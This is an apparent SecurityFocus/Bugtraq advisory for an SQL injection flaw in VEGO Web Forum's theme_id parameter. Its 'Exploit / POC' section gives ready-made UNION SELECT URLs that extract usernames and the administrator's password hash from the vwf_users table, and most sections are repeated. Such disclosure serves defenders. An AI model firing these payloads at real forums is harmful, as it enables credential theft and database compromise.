VEGO Web Forum Theme_ID SQL Injection Vulnerability
BID:16107
Info
VEGO Web Forum Theme_ID SQL Injection Vulnerability
| Bugtraq ID: | 16107 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 28 2005 12:00AM |
| Updated: | Dec 28 2005 12:00AM |
| Credit: | Discovery is credited to Aliaksandr Hartsuyeu. |
| Vulnerable: |
VEGO Web Forum 1.26 VEGO Web Forum 1.25 VEGO Web Forum 1.24 VEGO Web Forum 1.23 VEGO Web Forum 1.20 VEGO Web Forum 1.10 VEGO Web Forum 1.0 |
| Not Vulnerable: | |
Discussion
VEGO Web Forum Theme_ID SQL Injection Vulnerability
VEGO Web Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
VEGO Web Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
VEGO Web Forum Theme_ID SQL Injection Vulnerability
The following examples were provided:
For version 1.26:
http://www.example.com/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
Earlier versions:
http://www.example.com/temp/_1/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4%20from%20vwf_users% 20where%20userid=1/*
Hash of administrator's password -
For version 1.26:
http://www.example.com/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
Earlier versions:
http://www.example.com/temp/_1/webforum/index.php? theme_id=-1% 20union%20select% 201,2,pass, 4%20from%20vwf_users% 20where%20userid=1/*
The following examples were provided:
For version 1.26:
http://www.example.com/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
Earlier versions:
http://www.example.com/temp/_1/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4%20from%20vwf_users% 20where%20userid=1/*
Hash of administrator's password -
For version 1.26:
http://www.example.com/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
Earlier versions:
http://www.example.com/temp/_1/webforum/index.php? theme_id=-1% 20union%20select% 201,2,pass, 4%20from%20vwf_users% 20where%20userid=1/*
Solution / Fix
VEGO Web Forum Theme_ID SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
VEGO Web Forum Theme_ID SQL Injection Vulnerability
References:
References:
- VEGO Homepage (VEGO)
- VEGO Web Forum SQL Injection Vulnerability (eVuln)